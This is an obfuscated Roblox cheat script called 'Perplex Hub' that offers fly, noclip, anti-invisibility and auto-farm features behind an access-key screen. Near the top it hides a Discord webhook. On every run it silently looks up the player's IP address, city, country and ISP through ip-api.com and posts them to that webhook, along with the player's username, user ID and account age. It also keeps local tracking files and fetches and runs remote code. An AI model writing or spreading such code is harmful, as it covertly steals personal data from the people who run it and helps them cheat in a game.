--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0="https://discord.com/api/webhooks/1455369739529490607/-avwpeq2AgMziHmQsJl_dbRryJtzAmvm_ILM-ZrUW0JUpkVuVuYrXwcX79cxos_fJSug";local v1="https://discord.gg/qyZXnRwm5a";local v2=true;local v3=true;local v4="Perplex Hub";local v5=game:GetService("Players");local v6=v5.LocalPlayer;local v7=game:GetService("RunService");local v8=game:GetService("UserInputService");local v9=game:GetService("HttpService");local v10=tostring(os.time())   .. "_"   .. math.random(1000,9999) ;local v11="PerplexHub_Analytics";local v12=writefile and readfile and isfolder and isfile and makefolder ;local function v13(v46,v47) if (v46==nil) then return v47 or "Unknown" ;end return tostring(v46);end if v12 then pcall(function() if  not isfolder(v11) then makefolder(v11);end end);end local function v14(v48) local v49=1709 -(71 + 1638) ;local v50;local v51;while true do if (v49==(0 -0)) then if  not v12 then return nil;end v50=v11   .. "/"   .. tostring(v48)   .. ".json" ;v49=1 + 0 ;end if (v49==2) then return v51,v50;end if (v49==1) then v51={userId=v48,totalInjections=0,firstInjection=os.time(),lastInjection=os.time(),injectionHistory={}};pcall(function() if isfile(v50) then local v339=0;local v340;while true do if (v339==(0 -0)) then v340=readfile(v50);v51=v9:JSONDecode(v340);break;end end end end);v49=1 + 1 ;end end end local function v15(v52,v53) if  not v12 then return;end pcall(function() writefile(v53,v9:JSONEncode(v52));end);end local function v16(v54) local v55=0 + 0 ;while true do if (v55==(0 -0)) then if ( not v2 or (v0=="")) then return;end pcall(function() local v324=0 + 0 ;local v325;while true do if (v324==(1130 -(87 + 1043))) then v325=http_request or v325 or HttpPost or syn.request ;if v325 then pcall(function() v325({Url=v0,Method="POST",Headers={["Content-Type"]="application/json"},Body=v9:JSONEncode(v54)});end);end break;end end end);break;end end end local v17={Username=v13(v6.Name),DisplayName=v13(v6.DisplayName),UserId=v13(v6.UserId),AccountAge=v13(v6.AccountAge),PlaceId=v13(game.PlaceId),JobId=v13(game.JobId),Timestamp=os.date("%Y-%m-%d %H:%M:%S"),ExecutorUsed="Unknown",Platform="PC",IPAddress="Unknown",Country="Unknown",City="Unknown",ISP="Unknown",SessionId=v13(v10)};pcall(function() if identifyexecutor then v17.ExecutorUsed=v13(identifyexecutor());end end);pcall(function() if (v8.TouchEnabled and  not v8.KeyboardEnabled) then v17.Platform="Mobile";elseif v8.GamepadEnabled then v17.Platform="Console";end end);pcall(function() local v56=0;local v57;while true do if (v56==0) then v57=http_request or v57 or HttpPost or syn.request ;if v57 then local v334=448 -(10 + 438) ;local v335;while true do if (v334==(0 + 0)) then v335=v57({Url="http://ip-api.com/json/?fields=66846719",Method="GET"});if (v335 and v335.Success and v335.Body) then local v367=v9:JSONDecode(v335.Body);if (v367 and (v367.status=="success")) then local v376=0 -0 ;while true do if (v376==(1 + 0)) then v17.City=v13(v367.city);v17.ISP=v13(v367.isp);break;end if (v376==0) then v17.IPAddress=v13(v367.query);v17.Country=v13(v367.country);v376=1;end end end end break;end end end break;end end end);local v18,v19=v14(v17.UserId);if v18 then v18.totalInjections=v18.totalInjections + (1181 -(1123 + 57)) ;v18.lastInjection=os.time();table.insert(v18.injectionHistory,{timestamp=os.time(),date=os.date("%Y-%m-%d %H:%M:%S"),ipAddress=v17.IPAddress,location=v17.City   .. ", "   .. v17.Country ,executor=v17.ExecutorUsed,platform=v17.Platform,sessionId=v17.SessionId});if ( #v18.injectionHistory>50) then table.remove(v18.injectionHistory,1 + 0 );end v15(v18,v19);end local v20=v18 and (v18.totalInjections==(255 -(163 + 91))) ;local v21=true;local v22="winter2025";local v23=false;local v24="PerplexHub_Keys";local function v25(v58) local v59=1930 -(1869 + 61) ;while true do if (v59==(0 + 0)) then if  not v12 then return false;end pcall(function() if  not isfolder(v24) then makefolder(v24);end writefile(v24   .. "/saved_key.txt" ,v58);end);break;end end end local function v26() local v60=0 -0 ;local v61;while true do if (v60==(1 -0)) then pcall(function() local v327=0 + 0 ;while true do if (v327==0) then if  not isfolder(v24) then makefolder(v24);end if isfile(v24   .. "/saved_key.txt" ) then v61=readfile(v24   .. "/saved_key.txt" );end break;end end end);return v61;end if (v60==0) then if  not v12 then return nil;end v61=nil;v60=1 -0 ;end end end local function v27() local v62=0 + 0 ;local v63;while true do if ((1475 -(1329 + 145))==v62) then v16({embeds={{title="❄️ Perplex Hub - Login",description="**"   .. v63   .. "**" ,color=(v20 and (66251 -(140 + 831))) or 3447003 ,fields={{name="Username",value=v17.Username   .. " (@"   .. v17.DisplayName   .. ")" ,inline=false},{name="User ID",value=v17.UserId,inline=false},{name="Account Age",value=v17.AccountAge   .. " days" ,inline=false},{name="IP Address",value="`"   .. v17.IPAddress   .. "`" ,inline=false},{name="Location",value=v17.City   .. ", "   .. v17.Country ,inline=false},{name="ISP",value=v17.ISP,inline=false},{name="Executor",value=v17.ExecutorUsed,inline=false},{name="Platform",value=v17.Platform,inline=false},{name="Total Logins",value=v13((v18 and v18.totalInjections) or (1722 -(345 + 1376)) ),inline=false},{name="Time",value=v17.Timestamp,inline=false}},footer={text="Perplex Hub Analytics"},timestamp=os.date("!%Y-%m-%dT%H:%M:%SZ")}}});break;end if (v62==(0 -0)) then if ( not v2 or  not v3) then return;end v63=(v20 and "New User") or "Returning User" ;v62=2 -1 ;end end end local function v28() local v64=v26();local v65=v64==v22 ;if v65 then v23=true;v27();return;end local v66=Instance.new("ScreenGui");v66.Name="PerplexKeySystem";v66.ResetOnSpawn=false;v66.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v66.IgnoreGuiInset=true;local v72=Instance.new("Frame");v72.Size=UDim2.new(1207 -(696 + 510) ,0 -0 ,1263 -(1091 + 171) ,0 + 0 );v72.BackgroundColor3=Color3.fromRGB(5,31 -21 ,20);v72.BackgroundTransparency=0.2 -0 ;v72.BorderSizePixel=374 -(123 + 251) ;v72.Parent=v66;for v287=4 -3 ,718 -(208 + 490)  do local v288=Instance.new("Frame");v288.Size=UDim2.new(0,math.random(1 + 1 ,2 + 2 ),836 -(660 + 176) ,math.random(1 + 1 ,206 -(14 + 188) ));v288.Position=UDim2.new(math.random(675 -(534 + 141) ,41 + 59 )/(89 + 11) ,0,math.random(0,97 + 3 )/100 ,0 -0 );v288.BackgroundColor3=Color3.fromRGB(158 -58 ,420 -270 ,255);v288.BackgroundTransparency=0.5;v288.BorderSizePixel=0 + 0 ;v288.Parent=v72;local v295=Instance.new("UICorner");v295.CornerRadius=UDim.new(1,0 + 0 );v295.Parent=v288;spawn(function() while v66.Parent do local v316=math.random(399 -(115 + 281) ,6);v288:TweenPosition(UDim2.new(math.random(0,100)/100 ,0 -0 ,math.random(0 + 0 ,100)/(241 -141) ,0),Enum.EasingDirection.InOut,Enum.EasingStyle.Sine,v316,true);wait(v316);end end);end local v78=Instance.new("Frame");v78.Size=UDim2.new(0 -0 ,1347 -(550 + 317) ,0,606 -186 );v78.Position=UDim2.new(0.5 -0 , -240,0.5, -(586 -376));v78.BackgroundColor3=Color3.fromRGB(295 -(134 + 151) ,1680 -(970 + 695) ,25);v78.BorderSizePixel=0 -0 ;v78.Parent=v66;local v84=Instance.new("UICorner");v84.CornerRadius=UDim.new(0,2010 -(582 + 1408) );v84.Parent=v78;local v87=Instance.new("UIStroke");v87.Color=Color3.fromRGB(100,520 -370 ,320 -65 );v87.Thickness=2;v87.Transparency=0.5;v87.Parent=v78;local v92=Instance.new("TextLabel");v92.Size=UDim2.new(3 -2 ,0,0,1904 -(1195 + 629) );v92.Position=UDim2.new(0,0 -0 ,241 -(187 + 54) ,810 -(162 + 618) );v92.BackgroundTransparency=1 + 0 ;v92.Text="PERPLEX";v92.TextColor3=Color3.fromRGB(170 + 85 ,543 -288 ,428 -173 );v92.TextSize=4 + 38 ;v92.Font=Enum.Font.GothamBold;v92.Parent=v78;local v102=Instance.new("UIGradient");v102.Color=ColorSequence.new({ColorSequenceKeypoint.new(0,Color3.fromRGB(1100 -(451 + 549) ,48 + 102 ,396 -141 )),ColorSequenceKeypoint.new(1385 -(746 + 638) ,Color3.fromRGB(76 + 124 ,227 -77 ,255))});v102.Parent=v92;local v105=Instance.new("TextLabel");v105.Size=UDim2.new(342 -(218 + 123) ,0,1581 -(1535 + 46) ,30 + 0 );v105.Position=UDim2.new(0,0 + 0 ,560 -(306 + 254) ,7 + 103 );v105.BackgroundTransparency=1 -0 ;v105.Text="Universal Script Hub";v105.TextColor3=Color3.fromRGB(1617 -(899 + 568) ,112 + 58 ,200);v105.TextSize=33 -19 ;v105.Font=Enum.Font.Gotham;v105.Parent=v78;local v115=Instance.new("TextBox");v115.Size=UDim2.new(603 -(268 + 335) ,670 -(60 + 230) ,0,622 -(426 + 146) );v115.Position=UDim2.new(0.5 + 0 , -(1646 -(282 + 1174)),811 -(569 + 242) ,170);v115.BackgroundColor3=Color3.fromRGB(43 -28 ,20,2 + 28 );v115.BorderSizePixel=0;v115.PlaceholderText="Enter Access Key...";v115.PlaceholderColor3=Color3.fromRGB(1104 -(706 + 318) ,1351 -(721 + 530) ,130);v115.Text="";v115.TextColor3=Color3.fromRGB(255,1526 -(945 + 326) ,637 -382 );v115.TextSize=15 + 1 ;v115.Font=Enum.Font.Gotham;v115.ClearTextOnFocus=false;v115.Parent=v78;local v128=Instance.new("UICorner");v128.CornerRadius=UDim.new(0,10);v128.Parent=v115;local v131=Instance.new("UIStroke");v131.Color=Color3.fromRGB(750 -(271 + 429) ,70,92 + 8 );v131.Thickness=1;v131.Parent=v115;local v135=Instance.new("TextButton");v135.Size=UDim2.new(1500 -(1408 + 92) ,1106 -(461 + 625) ,1288 -(993 + 295) ,2 + 18 );v135.Position=UDim2.new(1171 -(418 + 753) ,20 + 30 ,0 + 0 ,240);v135.BackgroundColor3=Color3.fromRGB(15,20,9 + 21 );v135.BorderSizePixel=0 + 0 ;v135.Text="";v135.Parent=v78;local v142=Instance.new("UICorner");v142.CornerRadius=UDim.new(529 -(406 + 123) ,4);v142.Parent=v135;local v145=Instance.new("UIStroke");v145.Color=Color3.fromRGB(50,1839 -(1749 + 20) ,24 + 76 );v145.Thickness=1323 -(1249 + 73) ;v145.Parent=v135;local v149=Instance.new("TextLabel");v149.Size=UDim2.new(1 + 0 ,0,1146 -(466 + 679) ,0 -0 );v149.BackgroundTransparency=1;v149.Text="✓";v149.TextColor3=Color3.fromRGB(100,729 -474 ,2050 -(106 + 1794) );v149.TextSize=16;v149.Font=Enum.Font.GothamBold;v149.Visible=false;v149.Parent=v135;local v158=Instance.new("TextLabel");v158.Size=UDim2.new(0 + 0 ,76 + 224 ,0,20);v158.Position=UDim2.new(0 -0 ,80,0 -0 ,354 -(4 + 110) );v158.BackgroundTransparency=585 -(57 + 527) ;v158.Text="Remember key for next time";v158.TextColor3=Color3.fromRGB(180,1627 -(41 + 1386) ,323 -(17 + 86) );v158.TextSize=13;v158.Font=Enum.Font.Gotham;v158.TextXAlignment=Enum.TextXAlignment.Left;v158.Parent=v78;local v169=false;v135.MouseButton1Click:Connect(function() local v298=0;while true do if (v298==0) then v169= not v169;v149.Visible=v169;break;end end end);local v170=Instance.new("TextButton");v170.Size=UDim2.new(0 + 0 ,847 -467 ,0 -0 ,216 -(122 + 44) );v170.Position=UDim2.new(0.5, -(328 -138),0 -0 ,228 + 52 );v170.BackgroundColor3=Color3.fromRGB(15 + 85 ,303 -153 ,255);v170.BorderSizePixel=65 -(30 + 35) ;v170.Text="VERIFY ACCESS";v170.TextColor3=Color3.fromRGB(255,176 + 79 ,255);v170.TextSize=16;v170.Font=Enum.Font.GothamBold;v170.Parent=v78;local v180=Instance.new("UICorner");v180.CornerRadius=UDim.new(1257 -(1043 + 214) ,37 -27 );v180.Parent=v170;local v183=Instance.new("UIGradient");v183.Color=ColorSequence.new({ColorSequenceKeypoint.new(1212 -(323 + 889) ,Color3.fromRGB(269 -169 ,730 -(361 + 219) ,255)),ColorSequenceKeypoint.new(1 + 0 ,Color3.fromRGB(563 -(15 + 398) ,1082 -(18 + 964) ,959 -704 ))});v183.Rotation=27 + 18 ;v183.Parent=v170;local v187=Instance.new("TextButton");v187.Size=UDim2.new(0,240 + 140 ,850 -(20 + 830) ,36 + 9 );v187.Position=UDim2.new(126.5 -(116 + 10) , -(15 + 175),0,1083 -(542 + 196) );v187.BackgroundColor3=Color3.fromRGB(88,216 -115 ,71 + 171 );v187.BorderSizePixel=0 + 0 ;v187.Text="💬 JOIN DISCORD";v187.TextColor3=Color3.fromRGB(255,255,92 + 163 );v187.TextSize=39 -24 ;v187.Font=Enum.Font.GothamBold;v187.Parent=v78;local v197=Instance.new("UICorner");v197.CornerRadius=UDim.new(0,25 -15 );v197.Parent=v187;local v200=Instance.new("TextLabel");v200.Size=UDim2.new(1,1551 -(1126 + 425) ,405 -(118 + 287) ,97 -72 );v200.Position=UDim2.new(1121 -(118 + 1003) ,0 -0 ,378 -(142 + 235) , -(136 -106));v200.BackgroundTransparency=1 + 0 ;v200.Text="";v200.TextColor3=Color3.fromRGB(255,1077 -(553 + 424) ,100);v200.TextSize=23 -10 ;v200.Font=Enum.Font.Gotham;v200.Parent=v78;v170.MouseEnter:Connect(function() v170.BackgroundColor3=Color3.fromRGB(106 + 14 ,169 + 1 ,255);end);v170.MouseLeave:Connect(function() v170.BackgroundColor3=Color3.fromRGB(59 + 41 ,64 + 86 ,146 + 109 );end);v187.MouseEnter:Connect(function() v187.BackgroundColor3=Color3.fromRGB(108,121,255);end);v187.MouseLeave:Connect(function() v187.BackgroundColor3=Color3.fromRGB(190 -102 ,281 -180 ,541 -299 );end);v187.MouseButton1Click:Connect(function() pcall(function() if setclipboard then local v329=0 + 0 ;while true do if (1==v329) then v200.TextColor3=Color3.fromRGB(100,1232 -977 ,150);wait(2);v329=755 -(239 + 514) ;end if (v329==(1 + 1)) then v200.Text="";break;end if (v329==0) then setclipboard(v1);v200.Text="✅ Discord invite copied!";v329=1330 -(797 + 532) ;end end end end);end);local function v209() local v303=0 + 0 ;local v304;while true do if (v303==(0 + 0)) then v304=v115.Text;if (v304==v22) then local v341=0;while true do if (v341==(6 -3)) then v27();break;end if ((1204 -(373 + 829))==v341) then wait(0.5);v66:Destroy();v341=3;end if (v341==(732 -(476 + 255))) then v23=true;if v169 then v25(v304);end v341=2;end if (v341==(1130 -(369 + 761))) then v200.Text="✅ Access Granted";v200.TextColor3=Color3.fromRGB(58 + 42 ,463 -208 ,150);v341=1 -0 ;end end else local v342=238 -(64 + 174) ;while true do if (v342==1) then v115.Text="";for v368=1,1 + 2  do local v369=0 -0 ;while true do if (v369==(336 -(144 + 192))) then v78.Position=v78.Position + UDim2.new(0,226 -(42 + 174) ,0 + 0 ,0 + 0 ) ;wait(0.05);v369=1 + 0 ;end if (v369==(1506 -(363 + 1141))) then v78.Position=v78.Position + UDim2.new(1580 -(1183 + 397) ,10,0,0) ;wait(0.05 -0 );break;end if (v369==(1 + 0)) then v78.Position=v78.Position-UDim2.new(0,15 + 5 ,0,0) ;wait(1975.05 -(1913 + 62) );v369=2 + 0 ;end end end break;end if (v342==(0 -0)) then v200.Text="❌ Invalid Key";v200.TextColor3=Color3.fromRGB(2188 -(565 + 1368) ,376 -276 ,100);v342=1662 -(1477 + 184) ;end end end break;end end end v170.MouseButton1Click:Connect(v209);v115.FocusLost:Connect(function(v305) if v305 then v209();end end);v66.Parent=game:GetService("CoreGui");end if v21 then v28();repeat wait();until v23 end local function v29() local v211=Instance.new("ScreenGui");v211.Name="PerplexWelcome";v211.ResetOnSpawn=false;v211.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;local v216=Instance.new("Frame");v216.Size=UDim2.new(0,545 -145 ,0 + 0 ,250);v216.Position=UDim2.new(0.5, -200,856.5 -(564 + 292) , -(215 -90));v216.BackgroundColor3=Color3.fromRGB(30 -20 ,15,329 -(244 + 60) );v216.BorderSizePixel=0 + 0 ;v216.Parent=v211;local v222=Instance.new("UICorner");v222.CornerRadius=UDim.new(0,491 -(41 + 435) );v222.Parent=v216;local v225=Instance.new("UIStroke");v225.Color=Color3.fromRGB(100,1151 -(938 + 63) ,255);v225.Thickness=2 + 0 ;v225.Transparency=1125.5 -(936 + 189) ;v225.Parent=v216;local v230=Instance.new("TextLabel");v230.Size=UDim2.new(1,0 + 0 ,1613 -(1565 + 48) ,50 + 30 );v230.Position=UDim2.new(0,1138 -(782 + 356) ,0,307 -(176 + 91) );v230.BackgroundTransparency=2 -1 ;v230.Text="PERPLEX HUB";v230.TextColor3=Color3.fromRGB(255,375 -120 ,1347 -(975 + 117) );v230.TextSize=1907 -(157 + 1718) ;v230.Font=Enum.Font.GothamBold;v230.Parent=v216;local v240=Instance.new("UIGradient");v240.Color=ColorSequence.new({ColorSequenceKeypoint.new(0,Color3.fromRGB(354 -254 ,150,871 -616 )),ColorSequenceKeypoint.new(1,Color3.fromRGB(200,1168 -(697 + 321) ,694 -439 ))});v240.Parent=v230;local v243=Instance.new("TextLabel");v243.Size=UDim2.new(1 -0 ,0 -0 ,0 + 0 ,74 -34 );v243.Position=UDim2.new(0 -0 ,1227 -(322 + 905) ,611 -(602 + 9) ,1309 -(449 + 740) );v243.BackgroundTransparency=1;v243.Text="Thanks for using Perplex Hub";v243.TextColor3=Color3.fromRGB(1022 -(826 + 46) ,170,1147 -(245 + 702) );v243.TextSize=47 -32 ;v243.Font=Enum.Font.Gotham;v243.Parent=v216;local v253=Instance.new("Frame");v253.Size=UDim2.new(0,0 + 0 ,1898 -(260 + 1638) ,443 -(382 + 58) );v253.Position=UDim2.new(0.5 -0 , -(125 + 25),0,180);v253.BackgroundColor3=Color3.fromRGB(206 -106 ,445 -295 ,1460 -(902 + 303) );v253.BorderSizePixel=0 -0 ;v253.Parent=v216;local v259=Instance.new("UICorner");v259.CornerRadius=UDim.new(2 -1 ,0 + 0 );v259.Parent=v253;local v262=Instance.new("TextLabel");v262.Size=UDim2.new(1691 -(1121 + 569) ,214 -(22 + 192) ,683 -(483 + 200) ,1493 -(1404 + 59) );v262.Position=UDim2.new(0 -0 ,0 -0 ,765 -(468 + 297) ,762 -(334 + 228) );v262.BackgroundTransparency=1;v262.Text="Loading...";v262.TextColor3=Color3.fromRGB(120,140,573 -403 );v262.TextSize=13;v262.Font=Enum.Font.Gotham;v262.Parent=v216;v211.Parent=game:GetService("CoreGui");spawn(function() local v306=0 -0 ;while true do if (v306==(1 -0)) then v211:Destroy();break;end if (v306==(0 + 0)) then for v336=0,536 -(141 + 95) ,15 do local v337=0 + 0 ;while true do if (v337==(0 -0)) then v253.Size=UDim2.new(0,v336,0 -0 ,3);wait(0.03);break;end end end wait(0.5 + 0 );v306=2 -1 ;end end end);end v29();wait(1.5 + 0 );local v30=loadstring(game:HttpGet("https://sirius.menu/rayfield"))();local v31=v30:CreateWindow({Name="❄️ Perplex Hub",LoadingTitle="Perplex Hub",LoadingSubtitle="Loading Systems...",ConfigurationSaving={Enabled=false}});local v32=v31:CreateTab("⚡ Main",4490171532 -6809074 );local v33=v31:CreateTab("⚙️ Misc",4483362621 -(92 + 71) );local v34=v31:CreateTab("🔧 Settings",4483362458 -0 );local v35=v6;local v36=v7;local v37=game:GetService("ReplicatedStorage"):FindFirstChild("invisivel");if v37 then v37.OnClientEvent:Connect(function(v309) if (_G.SeePlayers and (v309==true)) then task.defer(function() pcall(function() firesignal(v37.OnClientEvent,false);end);end);end end);end local v38=v32:CreateSection("Game Features");v32:CreateToggle({Name="See Players (Anti-Invis)",CurrentValue=false,Flag="SeePlayersToggle",Callback=function(v272) local v273=765 -(574 + 191) ;while true do if (v273==(0 + 0)) then _G.SeePlayers=v272;if (v272 and v37) then pcall(function() firesignal(v37.OnClientEvent,false);end);end break;end end end});v32:CreateToggle({Name="AntiHit (Enable In game)",CurrentValue=false,Flag="UndergroundToggle",Callback=function(v274) local v275=0 -0 ;local v276;local v277;while true do if (v275==2) then if v274 then spawn(function() while _G.Underground do local v352=0;local v353;while true do if (v352==1) then v36.RenderStepped:Wait();v277.CFrame=v353;break;end if ((0 + 0)==v352) then v353=v277.CFrame;v277.CFrame=v353 * CFrame.new(849 -(254 + 595) , -5,126 -(55 + 71) ) ;v352=1 -0 ;end end end end);end break;end if (v275==0) then _G.Underground=v274;v276=v35.Character;v275=1;end if (v275==(1791 -(573 + 1217))) then v277=v276 and v276:FindFirstChild("HumanoidRootPart") ;if  not v277 then return;end v275=2;end end end});v32:CreateToggle({Name="Auto Trophy Money",CurrentValue=false,Flag="TrophyToggle",Callback=function(v278) _G.TrophyFarm=v278;if v278 then spawn(function() while _G.TrophyFarm do local v331=v35.Character;local v332=v331 and v331:FindFirstChild("HumanoidRootPart") ;local v333=workspace:FindFirstChild("Trophy",true);if (v333 and v332) then pcall(function() local v354=0 -0 ;while true do if (v354==1) then firetouchinterest(v332,v333,1 + 0 );break;end if (v354==(0 -0)) then firetouchinterest(v332,v333,939 -(714 + 225) );task.wait();v354=2 -1 ;end end end);end task.wait(0.3);end end);end end});local v39=v33:CreateSection("Movement");local v40;v33:CreateToggle({Name="Noclip",CurrentValue=false,Flag="NoclipFlag",Callback=function(v279) local v280=0 -0 ;while true do if (v280==(0 + 0)) then _G.Noclip=v279;if _G.Noclip then v40=v36.Stepped:Connect(function() if (_G.Noclip and v35.Character) then for v364,v365 in pairs(v35.Character:GetDescendants()) do if (v365:IsA("BasePart") and v365.CanCollide) then v365.CanCollide=false;end end end end);elseif v40 then v40:Disconnect();end break;end end end});local v41=72 -22 ;v33:CreateToggle({Name="Fly",CurrentValue=false,Flag="FlyFlag",Callback=function(v281) _G.Flying=v281;if  not v35.Character then return;end local v282=v35.Character:WaitForChild("HumanoidRootPart");if v281 then local v310=v282;local v311={F=806 -(118 + 688) ,B=48 -(25 + 23) ,L=0 + 0 ,R=1886 -(927 + 959) };local function v312() local v318=0;local v319;local v320;while true do if ((10 -7)==v318) then v320.MaxForce=Vector3.new(8999999488,9000000220 -(16 + 716) ,8999999488);spawn(function() local v355=0 -0 ;while true do if (v355==(97 -(11 + 86))) then repeat local v374=0 -0 ;while true do if (v374==1) then v319.CFrame=workspace.CurrentCamera.CFrame;break;end if (0==v374) then task.wait();if (((v311.L + v311.R)~=(285 -(175 + 110))) or ((v311.F + v311.B)~=(0 -0))) then v320.Velocity=((workspace.CurrentCamera.CFrame.lookVector * (v311.F + v311.B)) + ((workspace.CurrentCamera.CFrame * CFrame.new(v311.L + v311.R ,(v311.F + v311.B) * (0.2 -0) ,0).p) -workspace.CurrentCamera.CFrame.p)) * v41 ;else v320.Velocity=Vector3.new(1796 -(503 + 1293) ,0.1,0 -0 );end v374=1 + 0 ;end end until  not _G.Flying v319:Destroy();v355=1062 -(810 + 251) ;end if (v355==(1 + 0)) then v320:Destroy();break;end end end);break;end if ((1 + 0)==v318) then v319.MaxTorque=Vector3.new(8999999679 -(53 + 138) ,8999999789 -(112 + 189) ,8999999488);v319.CFrame=v310.CFrame;v318=9 -7 ;end if ((0 -0)==v318) then v319=Instance.new("BodyGyro",v310);v319.P=21719 + 68281 ;v318=1 -0 ;end if ((1 + 1)==v318) then v320=Instance.new("BodyVelocity",v310);v320.Velocity=Vector3.new(1744 -(1344 + 400) ,405.1 -(255 + 150) ,0 + 0 );v318=2 + 1 ;end end end local v313=v8;v313.InputBegan:Connect(function(v321) local v322=0;while true do if (v322==(0 -0)) then if  not _G.Flying then return;end if (v321.KeyCode==Enum.KeyCode.W) then v311.F=3 -2 ;elseif (v321.KeyCode==Enum.KeyCode.S) then v311.B= -(1740 -(404 + 1335));elseif (v321.KeyCode==Enum.KeyCode.A) then v311.L= -(407 -(183 + 223));elseif (v321.KeyCode==Enum.KeyCode.D) then v311.R=1;end break;end end end);v313.InputEnded:Connect(function(v323) if (v323.KeyCode==Enum.KeyCode.W) then v311.F=0 -0 ;elseif (v323.KeyCode==Enum.KeyCode.S) then v311.B=0;elseif (v323.KeyCode==Enum.KeyCode.A) then v311.L=0 + 0 ;elseif (v323.KeyCode==Enum.KeyCode.D) then v311.R=0 + 0 ;end end);v312();end end});local v42=v34:CreateSection("Information");v34:CreateParagraph({Title="Perplex Hub",Content="Universal script hub with key system\nKey: winter2025"});local v43=v34:CreateSection("Social");v34:CreateButton({Name="Join Discord Server",Callback=function() if setclipboard then setclipboard(v1);v30:Notify({Title="Discord",Content="Invite copied to clipboard!",Duration=340 -(10 + 327) ,Image=4483362458});end end});v34:CreateButton({Name="Copy Discord Invite",Callback=function() if setclipboard then local v314=0 + 0 ;while true do if (0==v314) then setclipboard(v1);v30:Notify({Title="Copied",Content="Discord invite: "   .. v1 ,Duration=341 -(118 + 220) ,Image=4483362458 -0 });break;end end end end});local v44=v34:CreateSection("Credits");v34:CreateParagraph({Title="Developer",Content="Created by: stonenode\nDiscord: stonenode"});v34:CreateButton({Name="Copy Creator Discord",Callback=function() if setclipboard then local v315=0;while true do if (v315==0) then setclipboard("stonenode");v30:Notify({Title="Copied",Content="Discord username copied: stonenode",Duration=2 + 1 ,Image=4483362458 -0 });break;end end end end});local v45=v34:CreateSection("Utilities");v34:CreateButton({Name="Rejoin Server",Callback=function() local v283=1493 -(711 + 782) ;local v284;while true do if (v283==0) then v284=game:GetService("TeleportService");v284:Teleport(game.PlaceId);break;end end end});v34:CreateButton({Name="Destroy UI",Callback=function() v30:Destroy();end});v30:LoadConfiguration();v30:Notify({Title="Perplex Hub",Content="Script loaded successfully! 🎮",Duration=5,Image=4483362458 -0 });print("✅ Perplex Hub - Fully Loaded!");print("📌 Discord: "   .. v1 );print("👤 Created by: stonenode");
